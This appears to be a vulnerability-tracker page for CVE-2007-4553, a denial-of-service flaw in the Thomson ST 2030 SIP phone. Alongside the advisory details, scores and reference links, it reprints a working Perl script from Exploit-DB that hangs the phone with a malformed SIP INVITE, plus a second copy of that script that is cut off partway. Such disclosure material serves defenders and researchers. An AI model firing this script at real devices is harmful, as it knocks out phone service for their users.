CVE-2007-4553
published 2007-08-28CVE-2007-4553: The Thomson ST 2030 SIP phone with software 1.52.1 allows remote attackers to cause a denial of service (device hang) via an INVITE message with a Via header…
PriorityP422medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
8.21%
94.2th percentile
The Thomson ST 2030 SIP phone with software 1.52.1 allows remote attackers to cause a denial of service (device hang) via an INVITE message with a Via header that contains a '/' (slash) instead of the required space following the SIP version number.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| thomson | st_2030_sip_phone | — | — |
| thomson | st_2030_sip_phone | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8rpc-f5pg-452p: The Thomson ST 2030 SIP phone with software 1
ghsa_unreviewed·2022-05-01
CVE-2007-4553 [MEDIUM] GHSA-8rpc-f5pg-452p: The Thomson ST 2030 SIP phone with software 1
The Thomson ST 2030 SIP phone with software 1.52.1 allows remote attackers to cause a denial of service (device hang) via an INVITE message with a Via header that contains a '/' (slash) instead of the required space following the SIP version number.
GHSA
GHSA-4937-fcr5-874r: The Thomson ST 2030 SIP phone with software 1
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2007-4753 [MEDIUM] GHSA-4937-fcr5-874r: The Thomson ST 2030 SIP phone with software 1
The Thomson ST 2030 SIP phone with software 1.52.1 allows remote attackers to cause a denial of service (device hang) via (1) an empty SIP message or (2) a SIP INVITE message with a malformed To header, different vectors than CVE-2007-4553.
No detection rules found.
Exploit-DB
Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service
exploitdb·2007-08-27
CVE-2007-4553 Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service
Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service
---
#!/usr/bin/perl
#Vulneravility for Thomson 2030 firmware v1.52.1
#It provokes a DoS in the device.
use IO::Socket::INET;
die "Usage $0 " unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: humbol\@192.168.1.2\r\nCSeq: 1 INVITE\r\n\r\n";
$socket->send($msg);
# milw0rm.com [2007-08-27]
Exploit-DB
Thomson SpeedTouch ST 2030 (SIP Phone) - SIP Invite Message Remote Denial of Service
exploitdb·2007-08-27
CVE-2007-4553 Thomson SpeedTouch ST 2030 (SIP Phone) - SIP Invite Message Remote Denial of Service
Thomson SpeedTouch ST 2030 (SIP Phone) - SIP Invite Message Remote Denial of Service
---
source: https://www.securityfocus.com/bid/25446/info
Thomson SpeedTouch 2030 is prone to a denial-of-service vulnerability because the device fails to handle specially crafted SIP INVITE messages.
Exploiting this issue allows remote attackers to cause the device to stop responding, thus denying service to legitimate users.
This issue affects Thomas SpeedTouch 2030 firmware 1.52.1; other versions may also be affected.
!/usr/bin/perl
#Vulnerability for Thomson 2030 firmware v1.52.1
#It provokes a DoS in the device.
use IO::Socket::INET;
die "Usage $0 " unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:$ARGV[2]\@
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065433.htmlhttp://secunia.com/advisories/26587http://securityreason.com/securityalert/3075http://www.securityfocus.com/bid/25446http://www.securitytracker.com/id?1018603http://www.vupen.com/english/advisories/2007/2988https://exchange.xforce.ibmcloud.com/vulnerabilities/36217http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065433.htmlhttp://secunia.com/advisories/26587http://securityreason.com/securityalert/3075http://www.securityfocus.com/bid/25446http://www.securitytracker.com/id?1018603http://www.vupen.com/english/advisories/2007/2988https://exchange.xforce.ibmcloud.com/vulnerabilities/36217
2007-08-28
Published